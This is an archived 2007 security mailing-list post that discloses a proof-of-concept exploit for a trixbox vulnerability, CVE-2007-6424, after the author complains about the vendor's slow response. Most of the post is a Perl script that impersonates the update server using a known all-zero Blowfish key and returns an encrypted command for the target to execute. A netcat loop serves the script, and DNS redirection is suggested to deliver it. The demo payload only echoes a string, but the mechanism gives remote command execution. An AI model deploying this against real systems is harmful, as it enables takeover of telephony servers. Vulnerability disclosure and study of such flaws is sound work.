[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code
Than Taro
thanrantaro at live.com
Tue Dec 18 22:25:46 EST 2007
Since Fonality has been incredibly slow in dealing with this (it was reported publicly on Saturday, and they don't expect to have a fix until at least Friday), I decided to take it upon myself to get a CVE, and also write some exploit code. I feel that 72+ hours is more than enough time to fix something this simple. They also do not appear to have any intentions of posting an advisory.
Run this in a simple script such as `while :; do netcat -l -p 80 -c "perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection can take it from there.
trixbox:~$ cat trixbox-exploit.pl
#!/usr/bin/perl
use strict;
use Crypt::CBC;

my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );

my $req = <STDIN>;
chomp $req;

my $hax;
if( $req =~ /ce00000000000000000000000000000000/ )
{
    $hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );
}
elsif( $req =~ /generate_id/ )
{
    $hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";
}
else
{
    $hax = "ERROR: invalid server id";
}
print "$hax";
trixbox:~$